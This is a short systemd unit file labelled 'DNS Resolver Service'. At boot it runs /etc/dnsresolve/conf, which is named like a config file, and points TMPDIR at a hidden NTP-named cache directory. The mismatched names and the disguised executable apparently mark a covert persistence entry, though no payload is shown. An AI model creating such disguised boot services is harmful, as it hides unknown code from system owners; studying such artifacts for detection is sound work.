[Unit]
Description=DNS Resolver Service
After=multi-user.target

[Service]
Type=oneshot
Environment="TMPDIR=/etc/ntpsync/.cache"
ExecStart=/etc/dnsresolve/conf

[Install]
WantedBy=multi-user.target

